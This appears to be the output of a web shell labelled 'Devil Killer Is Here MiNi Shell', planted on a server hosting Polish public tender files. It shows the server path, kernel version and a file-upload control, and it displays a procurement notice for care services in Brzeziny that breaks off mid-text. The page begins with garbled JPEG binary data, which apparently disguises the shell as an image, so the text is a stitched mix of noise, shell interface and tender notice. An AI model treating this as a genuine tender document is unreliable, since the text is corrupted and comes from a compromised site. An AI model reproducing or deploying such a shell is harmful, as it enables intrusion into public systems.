JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221214/0049562701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi społeczne na świadczenie podopiecznym Miejskiego Ośrodka Pomocy Społecznej w Brzezinach usług opiekuńczych i specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej w Brzezinach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005281015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Anny 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brzeziny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">46 874 12 95</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">46 874 02 80</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mops.brzeziny.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mopsbrzeziny.naszops.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi społeczne na świadczenie podopiecznym Miejskiego Ośrodka Pomocy Społecznej w Brzezinach usług opiekuńczych i specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bcd5e1e5-7ba4-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00495627</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bcd5e1e5-7ba4-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">pliki w formacie pdf, jpg, gif.zip.<br/>adresy do komunikacji z Wykonawcami<br/>https://miniportal.uzp.gov.pl<br/>sekretariat@mops.brzeziny.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl https://mopsbrzeziny.naszops.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady(UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uąiylenie dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), publ. Dz.<br/>Urz. UE L Nr 119, s.1 dalej RODO informujemy, iż<br/>1. Administratorem Pani/Pana danych osobowych jest Miejski Ośrodek Pomocy Spoołecznej w Brzezinach z siedzibą mieszczącą się<br/>pod adresem 95-060 Brzeziny, ul. Św. Anny 57, tel. 46 8741295, zwanym dalej &#34;Administratorem&#34;<br/>2. Administrator wyznaczył lnspektora Ochrony Danych, z którym może Pan/Pani skontaktować się pod adresem e-mail:<br/>sekretariat@mops.brzeziny.pl, lub pisemnie kierując korespondencję pod adres §iedziby Administratora.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit.c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego &#34; Specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi na<br/>rzecz mieszkańców miasta Brzeziny - świadczeniobiorców Miejskiego<br/>Ośrodka Pomocy Społecznej w Brzezinach&#34; prowadzonym w trybie przetargu nieograniczonego.<br/>*Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty , którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art.18 oraz art.74 ustawy Prawo zamówień publicznych(Dz.U. z 2022r. poz.1170), dalej&#39;Pzp&#34;;<br/>*Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeźeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>* obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikająz z<br/>ustawy Pzp;<br/>* w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art.22 RODO ;<br/>* Posiada Pani/Pan:<br/>a) na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 ROD0 prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): Nie przysługuje Pani/Panu:<br/>a) w związku z art.17 ust. 3 lit.b,d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art,6 ust.1 lit.c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.2601.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 316250 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie podopiecznym Miejskiego Ośrodka Pomocy Społecznej<br/>w Brzezinach usług opiekuńczych i specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi<br/>wchodzących w zakres świadczeń pomocy społecznej określonych w art. 50 ustawy z dnia 12 marca 2004 r. o pomocy<br/>społecznej (t.j. Dz. U. z 2021 r. poz. 2268) oraz na podstawie rozporządzenia Ministra Polityki Społecznej z dnia 22 września<br/>2005 roku w sprawie specjalistycznych usług opiekuńczych (Dz. U. 2005r. nr 189, poz.1598 z późn. zm.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312100-0 - Usługi opieki dziennej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312400-3 - Usługi opieki społecznej nieświadczone przez ośrodki pobytowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">) Ocenie zostaną poddane oferiy niepodlegające odrzuceniu.<br/>2) Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie<br/>wg następującej zasady:<br/>a) Cena za usługi opiekuńcze -30%<br/>b) Cena za specjalistyczne usługi opiekuńcze -30%<br/>PC 1 = Pmin 1 x 100 x 0,3 PC 2 = Pmin2 x 100 x 0,3<br/>PBI P82<br/>Gdzie:<br/>PC 1 - punkty za cenę na usługi opiekuńcze<br/>PB1 -cena oferiy badanej -usługi opiekuńcze<br/>Pminl -najnjższa cena oferiy -usługi opiekuńcze<br/>PC 2 - punkty za cenę na specjalistyczne usługi opiekuńcze<br/>P82 - cena oferiy badanej - usługi specjalistyczne<br/>Pmin2 - najniźsza cena oferiy - usługi specjalistyczne<br/>c) Doświadczenie osób wyznaczonych do realizacji zamówienia przez Wykonawcę, posiadających kwalifikacje zawodowe do<br/>świadczenia usług opiekuńczych -20 %<br/>4 osoby z największym doświadczeniem wyznaczone przez Wykonawcę do realizacji zamówienia, posiadające kwalifikację<br/>zawodowe do świadczenia usług opiekuńczych Liczba<br/>punktów<br/>15 lat i powyżej 20 pkt<br/>6 -14 lat 10 pkt<br/>1 - 5 lat 5 pkt<br/>poniżej 1 roku 0 pkt<br/>Ocena w zakresie tego kryterium będzie dokonywana na podstawie informacji zawartych w wykazie osób, skierowanych przez<br/>Wykonawcę do realizacji zamówienia publicznego z określeniem posiadanych przez te osoby kwalifikacji zawodowych, uprawnień,<br/>wykształcenia i doświadczenia wraz z dokumentami<br/>je potwierdzającymi, stanowiącego Załącznik nr 5<br/>d) Doświadczenie osób wyznaczonych do realizacji zamówienia przez Wykonawcę, posiadających kwalifikacje zawodowe do<br/>świadczen.ia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi -20 %<br/>1 osoba z największym doświadczeniem wyznaczona przez Wykonawcę do realizacji<br/>zamówienia, posiadająca kwalifikację zawodowe do świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami<br/>psychicznymi Liczba<br/>punktów<br/>15 lat i powyżej 20 pkt<br/>6 -14 lat 10 pkt<br/>1 - 5 lat 5 pkt<br/>poniżej 1 roku 0 pkt<br/>Ocena w zakresie tego kryterium będzie dokonywana na podstawie informacji zawartych w wykazie osób, skierowanych przez<br/>Wykonawcę do realizacji zamówienia publicznego<br/>z określeniem posiadanych przez te osoby kwalifikacji zawodowych, uprawnień, wykształcenia i doświadczenia wraz z dokumentami<br/>je potwierdzającymi, stanowiącego Załącznik nr 5a<br/>3) Za ofertę najkorzystniejszą uznana zostanie oferta o najwyższej łącznej ocenie punktowej obliczona według wzoru P = PC 1 + PC<br/>2 + P D. Pozostałym Wykonawcom przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 ) 0 udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniająwarunki udziału w postępowaniu tj.:<br/>a. posiadają kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych<br/>przepisów,<br/>b. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,<br/>c. posiadają zdolności techniczne lub zawodowe tj.<br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym<br/>okresie świadczyli, a w przypadku świadczeń okresowych lub ciągłych świadczą nadal, należycie usługi opiekuńcze i<br/>specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi dla co najmniej 20 osób miesięcznie przez okres<br/>jednego roku<br/>w przypadku udzielenia zamówienia zapewnią do wykonywania specjalistycznych usług opiekuńczych osoby, które zgodnie<br/>z rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 roku w sprawie specjalistycznych usług<br/>opiekuńczych (Dz.U.2005r. Nr 189, poz.1598 z późn. zm.) posiadają kwalifikacje do wykonywania zawodu m.in. pracownika<br/>socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej,<br/>opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizj.oterapeuty lub innego zawodu dającego wiedzę i<br/>umiejętności pozwalające świadczyć ww. usługi<br/>osoby świadczące specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi muszą posiadać co najmniej<br/>półroczny staż w jednej z instytucji: szpitalu psychiatrycznym, jednostce organizacyjnej pomocy społecznej dla osób z<br/>zaburzeniami psychicznymi, placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju<br/>lub upośledzeniem umysło\/\/ym, ośrodku terapeutyczno -edukacyjno -wychowawczym, zakładzie rehabilitacji lub w innej<br/>jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi. Specjalistyczne usługi<br/>opiekuńcze mogą być świadczone przez osoby, które zdobywają lub podnoszą wymagane kwalifikacje zawodowe, ale<br/>muszą posiadać co najmniej roczny staż pracy w jednostkach wymienionych powyżej i mają możliwość konsultacji z<br/>osobami świadczącymi ww. usługi, a posiadającymi kwalifikacje zawodowe<br/>osoby świadczące specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi muszą posiadać przeszkolenie<br/>i doświadczenie w zakresie umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań,<br/>kształtowania nawyków celowej aktywności, prowadzenia treningu zachowań społecznych.<br/>2) 0 udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegająwykluczeniu z postępowania o udzielenie<br/>zamówienia w okolicznościach, o których mowa w art.108 ust.1 oraz ah.109 ust.1 ustawy Pzp.<br/>3) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie na podstawie oświadczenia na podstawie art.<br/>125 ust.1 ustawy Pzp -o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a. W<br/>celu wykazania spełnienia warunków, o których mowa w pkt.17 Wykonawca wraz z ofertą zobowiązany jest przedłoźyć<br/>oświadczenie Wykonawcy składane na podstawie art.125 ust.1 ustawy Pzp -o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu -Załącznik nr 2 do SWZ<br/>b. W celu potwierdzenia wymagań, cech niezbędnych do przeprowadzenia postępowania zgodnie z art, 106 Pzp Wykonawca wraz<br/>ofehąprzedkłada:<br/>c. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofeh, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane. -Załącznik nr 3;<br/>Do wykazu usług należy dołączyć dokumenty potwierdzające, że usługi zostav wykonane lub są wykonywane należycie. W<br/>przypadku świadczeń okresowych lub ciągłych nadal wykonywanych dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>d. wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego z określeniem posiadanych przez te osoby<br/>kwalifikacji zawodowych, uprawnień, wykształcenia i doświadczenia wraz z dokumentami je potwierdzającymi.<br/>Wykaz musi obejmować:<br/>nie mniej niż 4 osoby do wykonywania usług opiekuńczych -Załącznik nr 5<br/>co najmniej 1 osobę do wykonywania specjalistycznych usług opiekuńczych -Załącznik nr 5a<br/>Wykonawca winien wskazać rodzaj stosunku prawnego łączącego go z wymienionymi osobami, a w przypadku gdy jest to stosunek<br/>inny niż umowa<br/>o pracę winien załączyć oświadczenie tej osoby, że w przypadku wyboru oferiy Wykonawcy osoba ta będzie współpracować z<br/>Wykonawcą w wykonywaniu zamówienia -Załącznik nr 4.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">świadczenie wykonawcy o niepodleganiu wykluczeniu z udziału w postępowaniu</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> c. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, wraz z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane. -Załącznik nr 3;<br/>Do wykazu usług należy dołączyć dokumenty potwierdzające, źe usługi zostały<br/>wykonane lub sąwykonywane należycie. W przypadku świadczeń okresowych lub<br/>ciągłych nadal wykonywanych dokumenty potwierdzające ich naleźyte wykonywanie<br/>powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania<br/>ofert.<br/>d. wykaz osób, skierowanych przez Wykonawcę do realizacj.i zamówienia publicznego<br/>z określeniem posiadanych przez te osoby kwalifikacji zawodowych, uprawnień, wykształcenia i doświadczenia wraz z<br/>dokumentami je potwierdzającymi.<br/>Wykaz musi obejmować:<br/>nie mniej niż 4 osoby do wykonywania usług opiekuńczych -Załącznik nr 5<br/>co najmniej 1 osobę do wykonywania specjalistycznych usług opiekuńczych -Załącznik nr 5a<br/>Wykonawca winien wskazać rodzaj stosunku prawnego łączącego go z wymienionymi osobami, a w przypadku gdy jest to<br/>stosunek inny niż umowa<br/>o pracę winien załączyć 